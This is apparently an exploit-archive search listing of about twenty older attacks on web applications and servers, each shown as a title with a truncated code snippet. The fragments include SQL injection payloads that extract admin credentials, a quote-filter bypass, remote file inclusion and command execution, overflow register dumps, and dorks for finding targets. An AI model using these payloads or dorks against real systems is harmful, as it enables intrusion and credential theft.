209 matches found
HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit
No description provided by source. ?php HLDS WebMod 0.48 rconpass Remote Heap Overflow Exploit Tested on HLDS Launcher 4.1.1.1, WebMod 0.48, Windows XP SP2 Hebrew shir, skod.uk at gmail dot com 17/12/2007 Registers rconpass = "A"x16444: EAX 67E04955 wmm.67E04955 ECX 41414141 EDX 41414141 EBX...
FLABER <= 1.1 RC1 Remote Command Execution Exploit
No description provided by source. ?php / -------------------------------------------------- FLABER = 1.1 RC1 Remote Command Execution Exploit -------------------------------------------------- author...: EgiX mail.....: n0b0d13satgmaildotcom link.....: http://sourceforge.net/projects/flaber -...
linpha-exec.txt
?php / -------------------------------------------------------------- LinPHA = 1.3.2 maps plugin Remote Command Execution Exploit -------------------------------------------------------------- author...: EgiX mail.....: n0b0d13satgmaildotcom link.....: http://linpha.sourceforge.net details..: wor...
LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit
No description provided by source. ?php / -------------------------------------------------------------- LinPHA = 1.3.3 maps plugin Remote Command Execution Exploit -------------------------------------------------------------- author...: EgiX mail.....: n0b0d13satgmaildotcom link.....:...
phpnuke80final-sql.txt
?php UNPUBLISHED RST/GHC EXPLOIT PHP Nuke sid sql injection exploit for Search module POST method - the best for version 8.0 FINAL coded by Foster & 1dt.w0lf tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions if isset$POST'Submit' $result=sendit'CONCAT"::",aid,"::",pwd,"::"'; if...
Coppermine Photo Gallery 1.4.10 - SQL Injection
Coppermine Photo Gallery 1.4.10 - SQL Injection table prefix\n"; print " - hostname\n"; print " - web dirname \n"; print " - force mode - '0' - for Off or "album number" for force mode On \n"; print " table prefix - prefix of sql tables\n"; print " example: " . $argv0 . " coppermine.site photo/ 1...
DCP-Portal 6.11 - SQL Injection
!/usr/bin/php -q But the script filter the quotes with this code, included in each page of the cms: 0 119. $str = $SERVER'QUERYSTRING'; 120. $arr = split';&', URLdecode$str; 121. $pos = strpos$str, "'"; 122. if $pos 123. $hackattempt = true; ... ? But we can bypass this control using %27 instead ...
ZeusCMS 0.3 - Blind SQL Injection
query"SELECT FROM $table WHERE url like '%$ref%' AND status='BLOCKED'"; numRows0 137. return true; 138. 139. else 140. return false; 141. 142. else 143. return false; 144. an attacker can inject sql code through http referer header, that isn't properly checked... Possible bug fix in /index.php :...
runcms-overwrite.txt
RunCmss Bug Yahoo! Crawler body font-size: 10px; font-family: verdana; INPUT BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: D50428; BACKGROUND: 590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: D50428; COLOR: 00ff00; BORDER-TOP-COLOR:...
IceBB 1.0-rc6 Remote Database Authentication Details Exploit
Exploit for unknown platform in category web applications ============================================================ IceBB 1.0-rc6 Remote Database Authentication Details Exploit ============================================================ ./includes/functions.php, line 73 $ip =...
phpstats-multi.txt
32 break; 100. 103. $title='?'; 104. if$option'pagetitle' && isset$GET't' 105. 106. $tmpTitle=htmlspecialcharsaddslashesurldecode$GET't'; 107. if$tmpTitle!='\\\" t \\\"' $title=$tmpTitle; 108. 109. 174. if $loaded=='?' && $title!='?' 175. $result=sqlquery"SELECT lastpage FROM...
PHP-Stats 0.1.9.2 - Multiple Vulnerabilities
PHP-Stats 0.1.9.2 - Multiple Vulnerabilities 32 break; 100. 103. $title='?'; 104. if$option'pagetitle' && isset$GET't' 105. 106. $tmpTitle=htmlspecialcharsaddslashesurldecode$GET't'; 107. if$tmpTitle!='\\\" t \\\"' $title=$tmpTitle; 108. 109. 174. if $loaded=='?' && $title!='?' 175...
Gelato SQL Injection exploit
? Gelato SQL Injection exploit Dork: "powered by gelato cms" Homepage: http://gelatocms.com s 0 c r a t e x msn: s0cratexatnasadotgov greetz: D.O.M and plexinium team iniset"maxexecutiontime",0; function gettext $in = fopen"php://stdin", 'r'; $text = fgets$in, 1024; $text = trim$text; return $tex...
hexamail-dos.txt
...
Hexamail Server 3.0.0.001 - 'pop3' Remote Overflow (PoC)
milw0rm.com 2007-08-30...
ecs-dos.txt
?php ---------------------------------------------------- --------Easy Chat Server Remote DoS Exploit--------- ---------------------------------------------------- -http://www.echatserver.com/------------------------ ---------------------------------------------------- -Tested on version 2.2 last...
Easy Chat Server 2.2 Remote Denial of Service Exploit
No description provided by source. ?php ---------------------------------------------------- --------Easy Chat Server Remote DoS Exploit--------- ---------------------------------------------------- -http://www.echatserver.com/------------------------...
phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit
!/usr/bin/php -q -d shortopentag=on ? print ' //'=============================================================================================== //'Script : phpDVD v1.0.4 //'Author : iLker Kandemir ilkerkandemiratmynet.com //'S.Page : http://ugo.scarlata.it/phpdvd/phpDVD-1.0.4.tar.gz //'Dork :...
minibb205-lfi.txt
? / \|/// \ - - // @ @ ----oOOo---oOOo--------------------------------------------------- Y! Underground Group [email protected] Dj7xpl.2600.ir ----ooooO-----Ooooo-------------------------------------------------- \ / \ / --------------------------------------------------------------------- !...
Alstrasoft Template Seller Pro 3.25 - Admin Password Change
Alstrasoft Template Seller Pro 3.25 - Admin Password Change !/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc4 echo "Usage: php ".$argv0." Host Path ID password Host: target server ip/hostname Path: path of template ID: A Valid Admin ID usally ...